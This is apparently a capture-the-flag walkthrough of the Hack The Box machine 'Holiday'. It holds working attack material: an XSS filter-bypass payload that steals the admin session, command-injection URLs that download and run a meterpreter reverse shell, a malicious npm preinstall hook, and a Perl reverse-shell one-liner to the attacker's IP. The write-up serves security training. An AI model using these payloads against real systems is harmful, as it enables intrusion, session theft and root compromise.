专栏首页madMenHoliday -- hack the box

Holiday -- hack the box

Introduction

Target: 10.10.10.25(Linux)

Kali: 10.10.16.65

Holiday is an insane box officially. It's really difficult to get the user permission. The most difficult part should be how to pass the XSS filter. It may need a lot of time. And the root privesc is based on the exploitation of npm install which is relatively fresh.

Information enumeration

As usual, use nmap to detect open ports and related services: nmap-A10.10.10.25:

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-19 09:49 GMT
Nmap scan report for htb.holiday (10.10.10.25)
Host is up (0.67s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c3:aa:3d:bd:0e:01:46:c9:6b:46:73:f3:d1:ba:ce:f2 (RSA)
| 256 b5:67:f5:eb:8d:11:e9:0f:dd:f4:52:25:9f:b1:2f:23 (ECDSA)
|_ 256 79:e9:78:96:c5:a8:f4:02:83:90:58:3f:e5:8d:fa:98 (ED25519)
8000/tcp open http Node.js Express framework
|_http-title: Error
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=5/19%OT=22%CT=1%CU=38324%PV=Y%DS=2%DC=T%G=Y%TM=5CE126E
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=107%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST1
OS:1NW7%O6=M54BST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M54BNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 111/tcp)
HOP RTT ADDRESS
1 630.30 ms 10.10.16.1
2 322.47 ms htb.holiday (10.10.10.25)

There are only two ports open. The port 8000 is an HTTP service which is hosted by Express. It should be our breakthrough.

Exploitation

Access to http://10.10.10.25:8000, there is nothing except an image. Download the image, and try to see more information about the image with ExifTool. Nothing interesting found.

Then try to brute force the directory. Gobuster and dirbuster seem not to be very useful for this box. If you try dirb, you will soon find some important directories, including admin, login. Try to access http://10.10.10.25:8000/login. It is a login web page. Try to login with some default credentials. Not work. Then use burp to save the login request to a file.

POST /login HTTP/1.1
Host: 10.10.10.25:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.25:8000/login
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Connection: close
Upgrade-Insecure-Requests: 1

username=admin&password=admin

Sqlmap

Try to use sqlmap to brute force the login request. Due to the awful network or something, sqlmap is slow for me to use for the boxed in hack the box. So try to prefer to get some important information instead of dump all information in sqlmap. For example, obtain tables firstly. Then dig into the interesting table.

sqlmap -r sql.req --level=5 --risk=3 --tables --threads=10

By sqlmap, it seems that the database is SQLite and there are 5 tables. The users table is interesting. There may are some valid user and password.

sqlmap -r sql.req --level=5 --risk=4 -T users --threads=10

A user is found. Hashkiller is a wonderful hash crack online tool. The hash can be cracked easily.

Log in with this user. It seems to be a booking website.

Click any booking and see the booking details. It consists of two tabs, including View and Notes. In Notes, one word is interesting: "All notes must be approved by an administrator - this process can take up to 1 minute." An administrator is always attractive to hackers. It seems that the note will be approved by the administrator. So it's possible to steal the session cookie of the administrator if there is an XSS vulnerability in the note edit form. I think it's the hardest part of this box. It's not easy to find the appropriate pass way. There is a way to utilize fromCharCode and other skills to pass the XSS filter. The following javascript code is utilized to generate the payload:

var url = 'http://localhost:8000/vac/8dd841ff-3f44-4f2b-9324-9a833e2c6b65';
var str = `$.ajax({method:'GET',url:'${url}',success:function(data){$.post('http://10.10.16.65',data)}})`;
console.log(str);
result = "";
for (var i = 0; i < str.length; i++) {
result += str.charCodeAt(i) + ',';
}
result = result.substr(0, result.length - 1);
console.log(result);
var payload = `<img src="x/><script>eval(String.fromCharCode(${result}));</script>">`;
console.log(payload);

Set kali to listen to port 80: nc-lvnp80. The code can be run in the chrome dev. Input the generated payload into the note, wait a minute the data will be sent to kali.

The cookie of the administrator is obtained which is HTML encoded. Decode it with a burp. And change the cookie in the storage of firefox. Refresh the web page. Now you can hijack the administrator session cookie. Access to http://10.10.10.25:8000/admin. There seems nothing special except two buttons, including Booking and Notes.

After some exploration, you will find that there is command injection in the two function url. You can try to access http://10.10.10.25:8000/admin/export?table=notes%26ls. You can find the directories in the exported file. One thing should be noticed, as & has been prohibited. So you can pass this by %26. Hence, it seems that the table name exists RCE. But it's limited to characters, numbers and /. So you should try to RCE by these. It's not possible to use the command to obtain reverse shell by command. For example, rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|/bin/sh-i2>&1|nc10.0.0.11234>/tmp/f. As many characters is not allowed.

Utilize msfvenom to generate the payload:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.16.65 LPORT=1234 -f elf > shell

Then upload the shell to the victim and execute it. As you are not allowed to use .. So convert the IP address to decimal by this website. Access the following URLs to execute the corresponding commands:

  • upload shell: http://10.10.10.25:8000/admin/export?table=notes%26cd%20/tmp%20%26%26wget%20168431681/shell
  • change permission: http://10.10.10.25:8000/admin/export?table=notes%26chmod%20777%20/tmp/shell
  • execute shell: http://10.10.10.25:8000/admin/export?table=notes%26cd%20/tmp/shell

Before running the shell, you should set meterpreter in Kaili.

use exploit/multi/handler
set LHOST 10.10.16.65
set LPORT 1234
set payload linux/x86/meterpreter/reverse_tcp
run

Then, we get the shell!

Privilege escalation

Check the sudo permissions firstly: sudo-l. You will find the user has the permission to execute sudo npm i. rimrafall this repository has described that npm install may be dangerous. It can be utilized to execute commands. You can upload the directory to the victim or create one by yourself.

cd app
mkdir rimrafall
cd rimrafall
echo "module.exports = "install my be dangerousr"" > index.js

Create the package.json and upload it to the target directory. preinstall can be utilized to execute the command. I have found that some command to obtain a reverse shell is not useful. As Perl is installed in the machine. And create a file called prel3 to obtain the reverse shell.

{  "name": "rimrafall",  "version": "1.0.0",  "description": "rm -rf /* # DO NOT INSTALL THIS",  "main": "index.js",  "scripts": {    "preinstall": "perl prel3"  },  "keywords": [    "rimraf",    "rmrf"  ],  "author": "João Jerónimo",  "license": "ISC"}
{
  "name": "rimrafall",
  "version": "1.0.0",
  "description": "rm -rf /* # DO NOT INSTALL THIS",
  "main": "index.js",
  "scripts": {
    "preinstall": "perl prel3"
  },
  "keywords": [
    "rimraf",
    "rmrf"
  ],
  "author": "João Jerónimo",
  "license": "ISC"
}
#prel3
use Socket;$i="10.10.16.65";$p=3344;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i"

Set kali listen to port 3344: nc-lvnp3344. In the victim, executed by: sudo npm i rimrafall. Now, we are root!

本文分享自微信公众号 - madMen(mad_coder),作者:madneal

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-05-20

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Haystack - hack the box

    HayStack is an easy box in hack the box. But it does isn't easy at all. It's ann...

    madneal
  • Cronos -- hack the box

    3 ports is open, detect the detailed services:

    madneal
  • Nibbles - Hack the box

    Target: 10.10.10.75(OS: Linux) Kali linux: 10.10.16.44

    madneal
  • 分布式计算中的8个谬论

    Eight-Fallacies-of-Distributed-Computing-Tech-Talk

    zhuanxu
  • windows平台下redis安装及配置文件介绍

    redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(...

    写代码的猿
  • SAP Hybris Commerce功能介绍:Consignment tracking

    This new feature is developed by Chengdu Hybris dev team. When a customer decide...

    Jerry Wang
  • [security] Go 1.11.3 and Go 1.10.6 pre-announcement

    We plan to issue Go 1.11.3 and Go 1.10.6 on Wednesday, December 12 at

    李海彬
  • DAY12:阅读CUDA C Runtime 之多GPU编程

    GPUS Lady
  • ​Linux 后门系列之 python3 反弹shell & 隐藏后门

    报错这一部分都是python本身代码的报错,并不是说可以作为分隔符。当然了,在某些场景下会有作用

    意大利的猫
  • 使用VisualVM进行Java应用的性能测量

    Recently I am trying to find a handy tool to measure the performance of my Java ...

    Jerry Wang

扫码关注云+社区

领取腾讯云代金券